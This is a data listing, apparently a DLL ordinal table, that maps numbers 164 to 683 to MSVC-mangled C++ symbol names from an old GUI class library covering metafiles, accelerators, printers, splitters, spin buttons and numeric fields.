164: b'?ChangePrefSize@GDIMetaFile@@QAE?AVSize@@ABV2@@Z',
165: b'?Clear@GDIMetaFile@@QAEXXZ',
166: b'?Duplicate@MetaAction@@QAEXXZ',
167: b'?GetBackgroundBrush@OutputDevice@@QBEABVBrush@@XZ',
168: b'?GetFillInBrush@OutputDevice@@QBEABVBrush@@XZ',
169: b'?GetFont@OutputDevice@@QBEABVFont@@XZ',
170: b'?GetMapMode@OutputDevice@@QBEABVMapMode@@XZ',
171: b'?GetOutDevType@OutputDevice@@QBE?AW4OutDevType@@XZ',
172: b'?GetPen@OutputDevice@@QBEABVPen@@XZ',
173: b'?GetPrefMapMode@GDIMetaFile@@QBEABVMapMode@@XZ',
174: b'?GetPrefSize@GDIMetaFile@@QBEABVSize@@XZ',
175: b'?GetRasterOp@OutputDevice@@QBE?AW4RasterOp@@XZ',
176: b'?GetScaleX@MapMode@@QBEABVFraction@@XZ',
177: b'?GetScaleY@MapMode@@QBEABVFraction@@XZ',
178: b'?Height@Size@@QAEAAFXZ',
179: b'?IsClipRegion@OutputDevice@@QBEEXZ',
180: b'?IsRecord@MetaFile@@QBEEXZ',
181: b'?Linker@GDIMetaFile@@UAEXPAXE@Z',
182: b'?Play@GDIMetaFile@@QAEXPAVOutputDevice@@ABVPoint@@ABVSize@@K@Z',
183: b'?Play@GDIMetaFile@@QAEXPAVOutputDevice@@K@Z',
184: b'?SaveStatus@GDIMetaFile@@QAEEXZ',
185: b'?Width@Size@@QAEAAFXZ',
186: b'?X@Point@@QAEAAFXZ',
187: b'?Y@Point@@QAEAAFXZ',
188: b'??0Color@@QAE@XZ',
189: b'??0GDIArcAct@@QAE@ABVRectangle@@ABVPoint@@1@Z',
190: b'??0GDIArcAct@@QAE@XZ',
191: b'??0GDIBkBrushAct@@QAE@ABVBrush@@@Z',
192: b'??0GDIBkBrushAct@@QAE@XZ',
193: b'??0GDIBmpAct@@QAE@ABVPoint@@ABVBitmap@@@Z',
194: b'??0GDIBmpAct@@QAE@XZ',
195: b'??0GDIBmpScalAct@@QAE@ABVPoint@@ABVSize@@ABVBitmap@@@Z',
196: b'??0GDIBmpScalAct@@QAE@XZ',
197: b'??0GDIClipAct@@QAE@ABVRegion@@@Z',
198: b'??0GDIClipAct@@QAE@XZ',
199: b'??0GDIElipAct@@QAE@ABVRectangle@@@Z',
200: b'??0GDIElipAct@@QAE@XZ',
201: b'??0GDIFillBrushAct@@QAE@ABVBrush@@@Z',
202: b'??0GDIFillBrushAct@@QAE@XZ',
203: b'??0GDIFontAct@@QAE@ABVFont@@@Z',
204: b'??0GDIFontAct@@QAE@XZ',
205: b'??0GDIHighAct@@QAE@ABVRectangle@@@Z',
206: b'??0GDIHighAct@@QAE@XZ',
207: b'??0GDIIconAct@@QAE@ABVPoint@@ABVIcon@@@Z',
208: b'??0GDIIconAct@@QAE@XZ',
209: b'??0GDIInAct@@QAE@ABVRectangle@@@Z',
210: b'??0GDIInAct@@QAE@XZ',
211: b'??0GDIInClipAct@@QAE@ABVRectangle@@@Z',
212: b'??0GDIInClipAct@@QAE@XZ',
213: b'??0GDIKernTextAct@@QAE@ABVPoint@@ABVString@@GGPAF@Z',
214: b'??0GDIKernTextAct@@QAE@XZ',
215: b'??0GDILineAct@@QAE@ABVPoint@@0@Z',
216: b'??0GDILineAct@@QAE@XZ',
217: b'??0GDIMTFAction@@QAE@ABVGDIMetaFile@@@Z',
218: b'??0GDIMTFAction@@QAE@ABVGDIMetaFile@@ABVPoint@@ABVSize@@@Z',
219: b'??0GDIMTFAction@@QAE@XZ',
220: b'??0GDIMapAct@@QAE@ABVMapMode@@@Z',
221: b'??0GDIMapAct@@QAE@XZ',
222: b'??0GDIMoveClipAct@@QAE@FF@Z',
223: b'??0GDIMoveClipAct@@QAE@XZ',
224: b'??0GDIPenAct@@QAE@ABVPen@@@Z',
225: b'??0GDIPenAct@@QAE@XZ',
226: b'??0GDIPieAct@@QAE@ABVRectangle@@ABVPoint@@1@Z',
227: b'??0GDIPieAct@@QAE@XZ',
228: b'??0GDIPixAct@@QAE@ABVPoint@@ABVColor@@@Z',
229: b'??0GDIPixAct@@QAE@XZ',
230: b'??0GDIPolLinAct@@QAE@ABVPolygon@@@Z',
231: b'??0GDIPolLinAct@@QAE@XZ',
232: b'??0GDIPolyPolyAct@@QAE@ABVPolyPolygon@@@Z',
233: b'??0GDIPolyPolyAct@@QAE@XZ',
234: b'??0GDIPolygonAct@@QAE@ABVPolygon@@@Z',
235: b'??0GDIPolygonAct@@QAE@XZ',
236: b'??0GDIPopAct@@QAE@XZ',
237: b'??0GDIPtAct@@QAE@ABVPoint@@@Z',
238: b'??0GDIPtAct@@QAE@XZ',
239: b'??0GDIPushAct@@QAE@XZ',
240: b'??0GDIRasterAct@@QAE@W4RasterOp@@@Z',
241: b'??0GDIRasterAct@@QAE@XZ',
242: b'??0GDIRectAct@@QAE@ABVRectangle@@GG@Z',
243: b'??0GDIRectAct@@QAE@XZ',
244: b'??0GDISetOriginAction@@QAE@ABVPoint@@@Z',
245: b'??0GDISetOriginAction@@QAE@XZ',
246: b'??0GDIStrechAct@@QAE@ABVPoint@@GABVString@@GG@Z',
247: b'??0GDIStrechAct@@QAE@XZ',
248: b'??0GDITextAct@@QAE@ABVPoint@@ABVString@@GG@Z',
249: b'??0GDITextAct@@QAE@XZ',
250: b'??0KernTextActionDescr@@QAE@XZ',
251: b'??0Point@@QAE@ABV0@@Z',
252: b'??0Rectangle@@QAE@ABV0@@Z',
253: b'??0Rectangle@@QAE@XZ',
254: b'??1GDIArcAct@@UAE@XZ',
255: b'??1GDIBkBrushAct@@UAE@XZ',
256: b'??1GDIBmpAct@@UAE@XZ',
257: b'??1GDIBmpScalAct@@UAE@XZ',
258: b'??1GDIClipAct@@UAE@XZ',
259: b'??1GDIElipAct@@UAE@XZ',
260: b'??1GDIFillBrushAct@@UAE@XZ',
261: b'??1GDIFontAct@@UAE@XZ',
262: b'??1GDIHighAct@@UAE@XZ',
263: b'??1GDIIconAct@@UAE@XZ',
264: b'??1GDIInAct@@UAE@XZ',
265: b'??1GDIInClipAct@@UAE@XZ',
266: b'??1GDIKernTextAct@@UAE@XZ',
267: b'??1GDILineAct@@UAE@XZ',
268: b'??1GDIMTFAction@@UAE@XZ',
269: b'??1GDIMapAct@@UAE@XZ',
270: b'??1GDIMoveClipAct@@UAE@XZ',
271: b'??1GDIPenAct@@UAE@XZ',
272: b'??1GDIPieAct@@UAE@XZ',
273: b'??1GDIPixAct@@UAE@XZ',
274: b'??1GDIPolLinAct@@UAE@XZ',
275: b'??1GDIPolyPolyAct@@UAE@XZ',
276: b'??1GDIPolygonAct@@UAE@XZ',
277: b'??1GDIPopAct@@UAE@XZ',
278: b'??1GDIPtAct@@UAE@XZ',
279: b'??1GDIPushAct@@UAE@XZ',
280: b'??1GDIRasterAct@@UAE@XZ',
281: b'??1GDIRectAct@@UAE@XZ',
282: b'??1GDISetOriginAction@@UAE@XZ',
283: b'??1GDIStrechAct@@UAE@XZ',
284: b'??1GDITextAct@@UAE@XZ',
285: b'??1KernTextActionDescr@@QAE@XZ',
286: b'??4Point@@QAEAAV0@ABV0@@Z',
287: b'??_7GDIArcAct@@6B@',
288: b'??_7GDIBkBrushAct@@6B@',
289: b'??_7GDIBmpAct@@6B@',
290: b'??_7GDIBmpScalAct@@6B@',
291: b'??_7GDIClipAct@@6B@',
292: b'??_7GDIElipAct@@6B@',
293: b'??_7GDIFillBrushAct@@6B@',
294: b'??_7GDIFontAct@@6B@',
295: b'??_7GDIHighAct@@6B@',
296: b'??_7GDIIconAct@@6B@',
297: b'??_7GDIInAct@@6B@',
298: b'??_7GDIInClipAct@@6B@',
299: b'??_7GDIKernTextAct@@6B@',
300: b'??_7GDILineAct@@6B@',
301: b'??_7GDIMTFAction@@6B@',
302: b'??_7GDIMapAct@@6B@',
303: b'??_7GDIMoveClipAct@@6B@',
304: b'??_7GDIPenAct@@6B@',
305: b'??_7GDIPieAct@@6B@',
306: b'??_7GDIPixAct@@6B@',
307: b'??_7GDIPolLinAct@@6B@',
308: b'??_7GDIPolyPolyAct@@6B@',
309: b'??_7GDIPolygonAct@@6B@',
310: b'??_7GDIPopAct@@6B@',
311: b'??_7GDIPtAct@@6B@',
312: b'??_7GDIPushAct@@6B@',
313: b'??_7GDIRasterAct@@6B@',
314: b'??_7GDIRectAct@@6B@',
315: b'??_7GDISetOriginAction@@6B@',
316: b'??_7GDIStrechAct@@6B@',
317: b'??_7GDITextAct@@6B@',
318: b'??_GGDIArcAct@@UAEPAXI@Z',
319: b'??_GGDIBkBrushAct@@UAEPAXI@Z',
320: b'??_GGDIBmpAct@@UAEPAXI@Z',
321: b'??_GGDIBmpScalAct@@UAEPAXI@Z',
322: b'??_GGDIClipAct@@UAEPAXI@Z',
323: b'??_GGDIElipAct@@UAEPAXI@Z',
324: b'??_GGDIFillBrushAct@@UAEPAXI@Z',
325: b'??_GGDIFontAct@@UAEPAXI@Z',
326: b'??_GGDIHighAct@@UAEPAXI@Z',
327: b'??_GGDIIconAct@@UAEPAXI@Z',
328: b'??_GGDIInAct@@UAEPAXI@Z',
329: b'??_GGDIInClipAct@@UAEPAXI@Z',
330: b'??_GGDIKernTextAct@@UAEPAXI@Z',
331: b'??_GGDILineAct@@UAEPAXI@Z',
332: b'??_GGDIMTFAction@@UAEPAXI@Z',
333: b'??_GGDIMapAct@@UAEPAXI@Z',
334: b'??_GGDIMoveClipAct@@UAEPAXI@Z',
335: b'??_GGDIPenAct@@UAEPAXI@Z',
336: b'??_GGDIPieAct@@UAEPAXI@Z',
337: b'??_GGDIPixAct@@UAEPAXI@Z',
338: b'??_GGDIPolLinAct@@UAEPAXI@Z',
339: b'??_GGDIPolyPolyAct@@UAEPAXI@Z',
340: b'??_GGDIPolygonAct@@UAEPAXI@Z',
341: b'??_GGDIPopAct@@UAEPAXI@Z',
342: b'??_GGDIPtAct@@UAEPAXI@Z',
343: b'??_GGDIPushAct@@UAEPAXI@Z',
344: b'??_GGDIRasterAct@@UAEPAXI@Z',
345: b'??_GGDIRectAct@@UAEPAXI@Z',
346: b'??_GGDISetOriginAction@@UAEPAXI@Z',
347: b'??_GGDIStrechAct@@UAEPAXI@Z',
348: b'??_GGDITextAct@@UAEPAXI@Z',
349: b'?Execute@GDIArcAct@@UAEXPAX@Z',
350: b'?Execute@GDIBkBrushAct@@UAEXPAX@Z',
351: b'?Execute@GDIBmpAct@@UAEXPAX@Z',
352: b'?Execute@GDIBmpScalAct@@UAEXPAX@Z',
353: b'?Execute@GDIClipAct@@UAEXPAX@Z',
354: b'?Execute@GDIElipAct@@UAEXPAX@Z',
355: b'?Execute@GDIFillBrushAct@@UAEXPAX@Z',
356: b'?Execute@GDIFontAct@@UAEXPAX@Z',
357: b'?Execute@GDIHighAct@@UAEXPAX@Z',
358: b'?Execute@GDIIconAct@@UAEXPAX@Z',
359: b'?Execute@GDIInAct@@UAEXPAX@Z',
360: b'?Execute@GDIInClipAct@@UAEXPAX@Z',
361: b'?Execute@GDIKernTextAct@@UAEXPAX@Z',
362: b'?Execute@GDILineAct@@UAEXPAX@Z',
363: b'?Execute@GDIMTFAction@@UAEXPAX@Z',
364: b'?Execute@GDIMapAct@@UAEXPAX@Z',
365: b'?Execute@GDIMoveClipAct@@UAEXPAX@Z',
366: b'?Execute@GDIPenAct@@UAEXPAX@Z',
367: b'?Execute@GDIPieAct@@UAEXPAX@Z',
368: b'?Execute@GDIPixAct@@UAEXPAX@Z',
369: b'?Execute@GDIPolLinAct@@UAEXPAX@Z',
370: b'?Execute@GDIPolyPolyAct@@UAEXPAX@Z',
371: b'?Execute@GDIPolygonAct@@UAEXPAX@Z',
372: b'?Execute@GDIPopAct@@UAEXPAX@Z',
373: b'?Execute@GDIPtAct@@UAEXPAX@Z',
374: b'?Execute@GDIPushAct@@UAEXPAX@Z',
375: b'?Execute@GDIRasterAct@@UAEXPAX@Z',
376: b'?Execute@GDIRectAct@@UAEXPAX@Z',
377: b'?Execute@GDISetOriginAction@@UAEXPAX@Z',
378: b'?Execute@GDIStrechAct@@UAEXPAX@Z',
379: b'?Execute@GDITextAct@@UAEXPAX@Z',
380: b'?Len@String@@QBEGXZ',
381: b'??0Fraction@@QAE@ABV0@@Z',
382: b'??0MapMode@@QAE@ABV0@@Z',
383: b'??0MapMode@@QAE@ABVResId@@@Z',
384: b'??0MapMode@@QAE@W4MapUnit@@@Z',
385: b'??0MapMode@@QAE@W4MapUnit@@ABVPoint@@ABVFraction@@2@Z',
386: b'??0MapMode@@QAE@XZ',
387: b'??0Point@@QAE@FF@Z',
388: b'??1MapMode@@QAE@XZ',
389: b'??4Fraction@@QAEAAV0@ABV0@@Z',
390: b'??4MapMode@@QAEAAV0@ABV0@@Z',
391: b'??8MapMode@@QBEEABV0@@Z',
392: b'??9MapMode@@QBEEABV0@@Z',
393: b'??9Pair@@QBEEABV0@@Z',
394: b'?ChangeMapUnit@MapMode@@QAE?AW4MapUnit@@W42@@Z',
395: b'?ChangeOrigin@MapMode@@QAE?AVPoint@@ABV2@@Z',
396: b'?ChangeScaleX@MapMode@@QAE?AVFraction@@ABV2@@Z',
397: b'?ChangeScaleY@MapMode@@QAE?AVFraction@@ABV2@@Z',
398: b'??0AccelData@@QAE@ABV0@@Z',
399: b'??0AccelData@@QAE@XZ',
400: b'??0AccelEntry@@QAE@XZ',
401: b'??0AccelTable@@QAE@ABV0@@Z',
402: b'??0AccelTable@@QAE@GG@Z',
403: b'??0Accelerator@@QAE@ABV0@@Z',
404: b'??0Accelerator@@QAE@ABVResId@@@Z',
405: b'??0Accelerator@@QAE@XZ',
406: b'??0KeyCode@@QAE@XZ',
407: b'??0Table@@QAE@ABV0@@Z',
408: b'??1AccelData@@QAE@XZ',
409: b'??1AccelEntry@@QAE@XZ',
410: b'??1AccelTable@@QAE@XZ',
411: b'??1Accelerator@@UAE@XZ',
412: b'??1KeyCode@@QAE@XZ',
413: b'??1Table@@QAE@XZ',
414: b'??4Accelerator@@QAEAAV0@ABV0@@Z',
415: b'??_7Accelerator@@6B@',
416: b'??_GAccelData@@QAEPAXI@Z',
417: b'??_GAccelEntry@@QAEPAXI@Z',
418: b'??_GAccelerator@@UAEPAXI@Z',
419: b'?Activate@Accelerator@@UAEXXZ',
420: b'?ChangeAccel@Accelerator@@QAEPAV1@GPAV1@@Z',
421: b'?ChangeKeyCode@Accelerator@@QAE?AVKeyCode@@GABV2@@Z',
422: b'?Clear@AccelList@@QAEXXZ',
423: b'?Clear@AccelTable@@QAEXXZ',
424: b'?Clear@Accelerator@@QAEXXZ',
425: b'?Clear@List@@QAEXXZ',
426: b'?Clear@Table@@QAEXXZ',
427: b'?Count@AccelTable@@QBEKXZ',
428: b'?Count@Table@@QBEKXZ',
429: b'?Deactivate@Accelerator@@UAEXXZ',
430: b'?EnableItem@Accelerator@@QAEEGE@Z',
431: b'?First@AccelList@@QAEPAVAccelerator@@XZ',
432: b'?First@AccelTable@@QAEPAVAccelEntry@@XZ',
433: b'?Get@AccelTable@@QBEPAVAccelEntry@@K@Z',
434: b'?GetAccel@Accelerator@@QBEPAV1@G@Z',
435: b'?GetCurKey@AccelTable@@QBEKXZ',
436: b'?GetFullCode@KeyCode@@QBEGXZ',
437: b'?GetFullFunction@KeyCode@@QBE?AW4KeyFuncType@@XZ',
438: b'?GetItemCount@Accelerator@@QBEGXZ',
439: b'?GetItemId@Accelerator@@QBEGABVKeyCode@@@Z',
440: b'?GetItemId@Accelerator@@QBEGG@Z',
441: b'?GetKeyCode@Accelerator@@QBE?AVKeyCode@@G@Z',
442: b'?InitAccelerator@@YGXPAVAccelerator@@@Z',
443: b'?Insert@AccelTable@@QAEEKPAVAccelEntry@@@Z',
444: b'?InsertItem@Accelerator@@QAEEABVResId@@@Z',
445: b'?InsertItem@Accelerator@@QAEEGABVKeyCode@@@Z',
446: b'?IsFunction@KeyCode@@QBEEXZ',
447: b'?IsItemEnabled@Accelerator@@QBEEG@Z',
448: b'?Next@AccelList@@QAEPAVAccelerator@@XZ',
449: b'?Next@AccelTable@@QAEPAVAccelEntry@@XZ',
450: b'?PopActivateHdl@Accelerator@@QAE?AVLink@@XZ',
451: b'?PopDeactivateHdl@Accelerator@@QAE?AVLink@@XZ',
452: b'?PopSelectHdl@Accelerator@@QAE?AVLink@@XZ',
453: b'?PushActivateHdl@Accelerator@@QAEXABVLink@@@Z',
454: b'?PushDeactivateHdl@Accelerator@@QAEXABVLink@@@Z',
455: b'?PushSelectHdl@Accelerator@@QAEXABVLink@@@Z',
456: b'?Remove@AccelTable@@QAEPAVAccelEntry@@K@Z',
457: b'?RemoveItem@Accelerator@@QAEXG@Z',
458: b'?Select@Accelerator@@UAEXXZ',
459: b'?SetHelpText@Accelerator@@QAEXABVString@@@Z',
460: b'??0AccelList@@QAE@ABV0@@Z',
461: b'??0AccelList@@QAE@GG@Z',
462: b'??0List@@QAE@ABV0@@Z',
463: b'??0List@@QAE@GG@Z',
464: b'??1AccelList@@QAE@XZ',
465: b'??1List@@QAE@XZ',
466: b'??_GAccelList@@QAEPAXI@Z',
467: b'?Count@AccelList@@QBEKXZ',
468: b'?Count@List@@QBEKXZ',
469: b'?GetAccelType@@YG?AW4AccelType@@PAVAccelerator@@@Z',
470: b'?GetCode@KeyCode@@QBEGXZ',
471: b'?GetObject@AccelList@@QBEPAVAccelerator@@K@Z',
472: b'?GetObject@List@@QBEPAXK@Z',
473: b'?GetPos@AccelList@@QBEKPAVAccelerator@@@Z',
474: b'?GetPos@List@@QBEKPBX@Z',
475: b'?Insert@AccelList@@QAEXPAVAccelerator@@K@Z',
476: b'?Insert@List@@QAEXPAXK@Z',
477: b'?IsMod1@KeyCode@@QBEEXZ',
478: b'?IsShift@KeyCode@@QBEEXZ',
479: b'?Remove@AccelList@@QAEPAVAccelerator@@PAV2@@Z',
480: b'?Remove@List@@QAEPAXPAX@Z',
481: b'?SetAccelCancelState@@YGXPAVAccelerator@@EPAVAccelList@@@Z',
482: b'?SetAccelItem@@YGXPAVAccelerator@@GABVKeyCode@@GPAVAccelList@@@Z',
483: b'?SetAccelList@@YGXPAVAccelerator@@PAVAccelList@@@Z',
484: b'?SetAccelType@@YGXPAVAccelerator@@W4AccelType@@@Z',
485: b'??0Link@@QAE@PAVLinkHdl@@P81@EJPAX@Z@Z',
486: b'??1InfoBox@@UAE@XZ',
487: b'?ChangeTimeoutHdl@Timer@@QAE?AVLink@@ABV2@@Z',
488: b'??1AutoTimer@@QAE@XZ',
489: b'??0JobSetup@@QAE@XZ',
490: b'??0PageMetaFile@@QAE@XZ',
491: b'??0Printer@@QAE@ABVString@@@Z',
492: b'??0Printer@@QAE@XZ',
493: b'??0Queue@@QAE@GG@Z',
494: b'??1PageMetaFile@@QAE@XZ',
495: b'??1Printer@@UAE@XZ',
496: b'??1Queue@@QAE@XZ',
497: b'??8JobSetup@@QBEEABV0@@Z',
498: b'??9JobSetup@@QBEEABV0@@Z',
499: b'??_7Printer@@6B@',
500: b'??_GPageMetaFile@@QAEPAXI@Z',
501: b'??_GPrinter@@UAEPAXI@Z',
502: b'?AbortJob@Printer@@QAEEXZ',
503: b'?ChangeEndPrintHdl@Printer@@QAE?AVLink@@ABV2@@Z',
504: b'?ChangePrintPageHdl@Printer@@QAE?AVLink@@ABV2@@Z',
505: b'?ChangeStartPrintHdl@Printer@@QAE?AVLink@@ABV2@@Z',
506: b'?EndJob@Printer@@QAEEXZ',
507: b'?EndPage@Printer@@QAEEXZ',
508: b'?EndPrint@Printer@@UAEXXZ',
509: b'?Error@Printer@@UAEXXZ',
510: b'?Get@Queue@@QAEPAXXZ',
511: b'?GetCurPrintPage@Printer@@QBEGXZ',
512: b'?GetJobSetup@Printer@@QAEEPAVJobSetup@@@Z',
513: b'?GetJobSetupSize@Printer@@QBEGXZ',
514: b'?GetOutputSizePixel@Printer@@UBE?AVSize@@XZ',
515: b'?GetPaperBinName@Printer@@QBE?AVString@@G@Z',
516: b'?HasSupport@Printer@@QAEEW4PrinterSupport@@E@Z',
517: b'?Insert@OutDevList@@QAEXPAVOutputDevice@@K@Z',
518: b'?InsertNewPage@Printer@@UAEXPAUPageMetaFile@@@Z',
519: b'?IsPrinting@Printer@@QBEEXZ',
520: b'?PrintPage@Printer@@UAEXXZ',
521: b'?Put@Queue@@QAEXPAX@Z',
522: b'?QueuePrintPageHdl@Printer@@QAEXPAV1@@Z',
523: b'?Record@GDIMetaFile@@QAEXPAVOutputDevice@@@Z',
524: b'?SetCopyCount@Printer@@QAEEGE@Z',
525: b'?SetJobSetup@Printer@@QAEEPAVJobSetup@@@Z',
526: b'?SetOrientation@Printer@@QAEEW4Orientation@@@Z',
527: b'?SetPageQueueSize@Printer@@UAEXG@Z',
528: b'?SetPaperBin@Printer@@QAEEG@Z',
529: b'?SetPrinterProps@Printer@@QAEEPBV1@@Z',
530: b'?SetQuality@Printer@@QAEEW4Quality@@@Z',
531: b'?Setup@Printer@@QAEEXZ',
532: b'?StartJob@Printer@@QAEEABVString@@@Z',
533: b'?StartPage@Printer@@QAEEXZ',
534: b'?StartPrint@Printer@@UAEXXZ',
535: b'??0Fraction@@QAE@XZ',
536: b'??0Preview@@QAE@PAVWindow@@G@Z',
537: b'??0Rectangle@@QAE@ABVPoint@@ABVSize@@@Z',
538: b'??1Preview@@UAE@XZ',
539: b'??_7Preview@@6BPrinter@@@',
540: b'??_7Preview@@6BWindow@@@',
541: b'??_EPreview@@WPA@AEPAXI@Z',
542: b'??_GPreview@@UAEPAXI@Z',
543: b'?CalcWindowSizePixel@Preview@@QBE?AVSize@@ABV2@@Z',
544: b'?ChangeCurPage@Preview@@QAEGG@Z',
545: b'?ChangeHookHdl@MetaFile@@QAE?AVLink@@ABV2@@Z',
546: b'?ChangePageOffset@Preview@@QAE?AVPoint@@ABV2@@Z',
547: b'?ChangeZoomFactor@Preview@@QAE?AVFraction@@ABV2@@Z',
548: b'?Count@Queue@@QBEKXZ',
549: b'?GetColor@Brush@@QBEABVColor@@XZ',
550: b'?GetColor@Font@@QBEABVColor@@XZ',
551: b'?GetColor@Pen@@QBEABVColor@@XZ',
552: b'?GetCurPage@Printer@@QBEGXZ',
553: b'?GetDenominator@Fraction@@QBEJXZ',
554: b'?GetFillColor@Brush@@QBEABVColor@@XZ',
555: b'?GetFillColor@Font@@QBEABVColor@@XZ',
556: b'?GetNumerator@Fraction@@QBEJXZ',
557: b'?GetObject@Queue@@QBEPAXK@Z',
558: b'?GetOrigin@MapMode@@QBEABVPoint@@XZ',
559: b'?GetPageOffsetPixel@Printer@@QBE?AVPoint@@XZ',
560: b'?GetPageQueueSize@Printer@@QBEGXZ',
561: b'?GetPaperSize@Printer@@QBE?AVSize@@XZ',
562: b'?GetPaperSizePixel@Printer@@QBE?AVSize@@XZ',
563: b'?GetRequestPage@Preview@@QBEGXZ',
564: b'?GetType@MetaAction@@QBEGXZ',
565: b'?GetVisibleSize@Preview@@QBE?AVSize@@XZ',
566: b'?Height@Size@@QBEFXZ',
567: b'?InsertNewPage@Preview@@UAEXPAUPageMetaFile@@@Z',
568: b'?Paint@Preview@@UAEXABVRectangle@@@Z',
569: b'?RequestPage@Preview@@UAEXXZ',
570: b'?SetPageQueueSize@Preview@@UAEXG@Z',
571: b'?Width@Size@@QBEFXZ',
572: b'?X@Point@@QBEFXZ',
573: b'?Y@Point@@QBEFXZ',
574: b'??0SplitBar@@QAE@PAVWindow@@ABVResId@@@Z',
575: b'??0SplitBar@@QAE@PAVWindow@@G@Z',
576: b'??0Splitter@@QAE@FPAVWindow@@G@Z',
577: b'??0Splitter@@QAE@PAVWindow@@ABVResId@@@Z',
578: b'??0Splitter@@QAE@PAVWindow@@G@Z',
579: b'??1SplitBar@@UAE@XZ',
580: b'??1Splitter@@UAE@XZ',
581: b'??4Rectangle@@QAEAAV0@ABV0@@Z',
582: b'??_7SplitBar@@6B@',
583: b'??_7Splitter@@6B@',
584: b'??_GSplitBar@@UAEPAXI@Z',
585: b'??_GSplitter@@UAEPAXI@Z',
586: b'?Bottom@Rectangle@@QAEAAFXZ',
587: b'?ChangeDragRectPixel@Splitter@@QAE?AVRectangle@@ABV2@PAVWindow@@@Z',
588: b'?ChangeScrollBar1@SplitBar@@QAEPAVScrollBar@@PAV2@@Z',
589: b'?ChangeScrollBar2@SplitBar@@QAEPAVScrollBar@@PAV2@@Z',
590: b'?ChangeSplitPosPixel@SplitBar@@UAEFF@Z',
591: b'?ChangeSplitPosPixel@Splitter@@UAEFF@Z',
592: b'?ChangeSplitWidthPixel@SplitBar@@QAEGG@Z',
593: b'?DeleteRegion@@YGXPAUHRGN__@@@Z',
594: b'?GetHeight@Rectangle@@QBEFXZ',
595: b'?GetPosPixel@MouseEvent@@QBEABVPoint@@XZ',
596: b'?GetWidth@Rectangle@@QBEFXZ',
597: b'?Left@Rectangle@@QAEAAFXZ',
598: b'?MouseButtonDown@Splitter@@UAEXABVMouseEvent@@@Z',
599: b'?MouseButtonUp@Splitter@@UAEXABVMouseEvent@@@Z',
600: b'?MouseMove@Splitter@@UAEXABVMouseEvent@@@Z',
601: b'?Resize@SplitBar@@UAEXXZ',
602: b'?Right@Rectangle@@QAEAAFXZ',
603: b'?Split@Splitter@@UAEXXZ',
604: b'?StartDrag@Splitter@@QAEXXZ',
605: b'?Top@Rectangle@@QAEAAFXZ',
606: b'?TopLeft@Rectangle@@QBE?AVPoint@@XZ',
607: b'??0EntryType@@QAE@ABVBitmap@@@Z',
608: b'??0EntryType@@QAE@ABVString@@@Z',
609: b'??0EntryType@@QAE@ABVString@@ABVBitmap@@@Z',
610: b'??1EntryType@@QAE@XZ',
611: b'??_GEntryType@@QAEPAXI@Z',
612: b'?GetCurPos@List@@QBEKXZ',
613: b'?Insert@List@@QAEXPAX@Z',
614: b'?Remove@List@@QAEPAXK@Z',
615: b'??0Rectangle@@QAE@ABVPoint@@0@Z',
616: b'??0SpinButton@@QAE@PAVWindow@@ABVResId@@@Z',
617: b'??0SpinButton@@QAE@PAVWindow@@G@Z',
618: b'??1SpinButton@@UAE@XZ',
619: b'??_7SpinButton@@6B@',
620: b'??_GSpinButton@@UAEPAXI@Z',
621: b'??_H@YGXPAXIHP6EX0@Z@Z',
622: b'?BottomLeft@Rectangle@@QBE?AVPoint@@XZ',
623: b'?BottomRight@Rectangle@@QBE?AVPoint@@XZ',
624: b'?Disable@SpinButton@@QAEXXZ',
625: b'?Down@SpinButton@@UAEXXZ',
626: b'?Enable@SpinButton@@QAEXXZ',
627: b'?GetKeyCode@KeyEvent@@QBEABVKeyCode@@XZ',
628: b'?GetSize@Rectangle@@QBE?AVSize@@XZ',
629: b'?GetTimeout@Timer@@QBEKXZ',
630: b'?IsLeft@MouseEvent@@QBEEXZ',
631: b'?KeyInput@SpinButton@@UAEXABVKeyEvent@@@Z',
632: b'?MouseButtonDown@SpinButton@@UAEXABVMouseEvent@@@Z',
633: b'?MouseButtonUp@SpinButton@@UAEXABVMouseEvent@@@Z',
634: b'?MouseMove@SpinButton@@UAEXABVMouseEvent@@@Z',
635: b'?Paint@SpinButton@@UAEXABVRectangle@@@Z',
636: b'?Resize@SpinButton@@UAEXXZ',
637: b'?Timeout@SpinButton@@QAEXPAVTimer@@@Z',
638: b'?TopRight@Rectangle@@QBE?AVPoint@@XZ',
639: b'?Up@SpinButton@@UAEXXZ',
640: b'??0BigInt@@QAE@H@Z',
641: b'??0BigInt@@QAE@J@Z',
642: b'??0BigInt@@QAE@XZ',
643: b'??0CurrFmt@@QAE@ABVResId@@@Z',
644: b'??0CurrFmt@@QAE@XZ',
645: b'??0CurrencyBox@@QAE@PAVWindow@@ABVResId@@@Z',
646: b'??0CurrencyBox@@QAE@PAVWindow@@G@Z',
647: b'??0CurrencyField@@QAE@PAVWindow@@ABVResId@@@Z',
648: b'??0CurrencyField@@QAE@PAVWindow@@G@Z',
649: b'??0KeyEvent@@QAE@XZ',
650: b'??0MetFmt@@QAE@ABVResId@@@Z',
651: b'??0MetFmt@@QAE@XZ',
652: b'??0MetricBox@@QAE@PAVWindow@@ABVResId@@@Z',
653: b'??0MetricBox@@QAE@PAVWindow@@G@Z',
654: b'??0MetricField@@QAE@PAVWindow@@ABVResId@@@Z',
655: b'??0MetricField@@QAE@PAVWindow@@G@Z',
656: b'??0NumFmt@@QAE@ABVResId@@@Z',
657: b'??0NumFmt@@QAE@XZ',
658: b'??0NumericBox@@QAE@PAVWindow@@ABVResId@@@Z',
659: b'??0NumericBox@@QAE@PAVWindow@@G@Z',
660: b'??0NumericField@@QAE@PAVWindow@@ABVResId@@@Z',
661: b'??0NumericField@@QAE@PAVWindow@@G@Z',
662: b'??0Rectangle@@QAE@FFFF@Z',
663: b'??0Selection@@QAE@FF@Z',
664: b'??0Selection@@QAE@XZ',
665: b'??0SpinField@@QAE@FPAVWindow@@G@Z',
666: b'??0SpinField@@QAE@PAVWindow@@ABVResId@@@Z',
667: b'??0SpinField@@QAE@PAVWindow@@G@Z',
668: b'??1CurrFmt@@QAE@XZ',
669: b'??1CurrencyBox@@UAE@XZ',
670: b'??1CurrencyField@@UAE@XZ',
671: b'??1KeyEvent@@QAE@XZ',
672: b'??1MetFmt@@QAE@XZ',
673: b'??1MetricBox@@UAE@XZ',
674: b'??1MetricField@@UAE@XZ',
675: b'??1NumFmt@@QAE@XZ',
676: b'??1NumericBox@@UAE@XZ',
677: b'??1NumericField@@UAE@XZ',
678: b'??1SpinField@@UAE@XZ',
679: b'??AString@@QBEDG@Z',
680: b'??BBigInt@@QBEJXZ',
681: b'??BFraction@@QBEJXZ',
682: b'??D@YG?AVBigInt@@ABV0@0@Z',
683: b'??K@YG?AVBigInt@@ABV0@0@Z',
